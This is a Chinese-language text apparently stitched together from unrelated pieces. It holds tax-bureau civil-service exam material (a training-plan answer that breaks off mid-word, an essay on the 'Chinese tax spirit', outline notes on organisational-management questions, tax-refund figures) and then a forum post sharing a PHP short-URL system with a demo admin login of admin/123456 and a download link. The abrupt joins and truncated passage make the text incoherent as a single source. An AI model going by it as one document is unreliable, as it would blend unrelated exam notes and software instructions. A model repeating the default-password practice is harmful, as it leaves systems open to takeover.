再次,安排以“实战实践 岗位先锋”为主题的实战化培训。为突出“应用型人才”的特点,我会在办税服务厅导税台和窗口岗安排实习岗位,请新同事们学习导税流程、金三系统操作规范,以及电子税务局的常见业务操作方法。同时,还会安排稽查局的业务骨干结合本地区实例,为新入职公务员讲解常见涉税风险,以及相关风险应对的基本方法。
最后,安排以“比学赶超 结果运用”为主题的培训后考核。一方面我会加强日常管理,选任小组长对大家进行提醒监督,做好考勤管理;另一方面,在培训后组织理论知识考核和上机操作考核,未通过考核的同事需参加二次培训。
第三,提交方案。在培训方案准备完毕后,我也会做好排版,将方案及时提交给领导,并根据领

3税务精神
两个百年的历史交汇期,中国税务精神对于谋划高质量“十四五”税收发展规划、促进我国经济结构调整、社会转型等各方面的发展有着重要意义。具体而言,其精神内涵包括以下几方面。
首先,忠诚担当是中国税务精神的根本原则。作为税务工作者,只有做到对组织忠诚、对人民忠诚,才能在面对困难的时候有担当的精神和勇气。只有坚定为人民服务的信念,在面临企业或群众的服务诉求时,才能从群众需求出发,无私奉献。正如中国好税官李平,尽管身患脑瘤,但凭借着对税务工作的热爱与忠诚担当的品质,在病情好转之后仍旧投身岗位一线,推动税制改革,提出“一站式服务”等,为税务事业贡献了所有的热情。正是因为有着无数忠诚担当的税官,税务工作才能随时代发展不断进步。
其次,崇法守纪是中国税务精神的基本要求。崇法守纪即严守纪律底线红线,税务工作者是执法者,更是税法的捍卫者。只有坚定法治理念,才能在面对钱权利益的时候,言有所戒、行有所止。例如在落实对中小企业的税收优惠政策时,做到真正从企业角度出发,遵循制度要求,不徇私情。反之,如果不能以崇法守纪约束自我,就容易以权压法,难以做到清正廉洁,公正执法。
最后,兴税强国是中国税务精神的目标追求。为国聚财,为民收税是税务部门的服务宗旨。只有强化税务部门的整体作用力,发挥税收的实际效能,才能进一步发挥“放管服”的作用,推动减税降费,激发市场经济活力,从而有利于完善现代税收制度,发挥税收的稳定器与调节器的作用,也是提升国家治理体系,治理能力现代化的有力抓手。
因此,作为立志报考税务部门的我来说,一定会践行好中国税务精神,做到坚定思想信念,强化忠诚担当;加强业务学习,严守纪法红线;创新工作方法,积极贡献智慧与力量。

2组织管理最后整理
调研,人,方 宣 实干 效

调研重点
1.(细)人员专业:一明确目的,学习文件经验;二科学制作问卷,制定方法
2.对象广泛(准)、内容全面(实)、方式灵活(深入人群)
3.总结有效(效)

宣传
1.目的明确
2.准备到位、方案新颖:一人员、二资金、三物资(视频、横幅)
3.全面宣传 确保有效
a渠道多元、b内容全面、c对象准确
线上(微博话题、公众号);线下(进社区、学校、餐厅)
4.跟进有效

接待:
1.拉开单子,沟通细节
2.铺好路子,准备到位
3.迈稳步子,接待有序(扩充几个项目内容,文化、业务;技术分析;党建、)
4.送回去,保持联系

整治
1.明察暗访结合
2.自查督查相结合
3.惩治和扶持相结合
4.短期和长期相结合

活动
1.方案新颖,准备到位
2.宣传预热营造氛围
3.开展到位,确保长效(补充方式、内容)
扩充知识点,讲话、内容、乐趣
4.跟进到位,扩大影响

比赛
1.制定方案,准备到位
2.宣传预热,人员到位
3.全面开展,比学赶超
4.跟进记录,扩大影响

会议:
1.调研,研读文件
2.宣传
3.开展
4.记录

2税务最新最新最新
便民春风9年54类197项

截至6月,已累计退税减税降费及缓缴税费超2万亿元,纳税人获得退税7736亿元,户均退税115.2万元,92.75%的纳税人认为享受政策获得感明显。
题目:落实留抵退税政策 助力稳住经济大盘

前两年流行的新浪短网址和一些小站长搭建的短网址基本都gg了,想要一个既稳定又好用的短网址系统只有自己搭建了,今天给大家分享一个很好用的短网址系统,本系统是国内程序员开发,后台简洁,适合自用(后期还会分享一个多用户运营版的短网址系统,搭建起来后可以用来开通会员售卖)
不像其他坛友分享的好多都是国外搬运过来的,后台复杂,有很多没用的功能,bug一大堆

后台界面


测试地址(开放至本月底)

http://dwz.dw3.top/admin/
帐号admin,密码123456

运行环境php5.4-5.6(不支持php7.0)
安装过程也十分简单,上传程序文件,访问首页地址就会弹出安装界面

后台地址:xxxx.com/admin

进入后台唯一需要设置的就是域名这块,设置成你自己的即可

访问短网址出现404界面,需要自行配置一下伪静态规则,nginx伪静态规则在根目录的nginx.conf里面

源码下载地址:https://wwp.lanzout.com/iO9Eb07afnab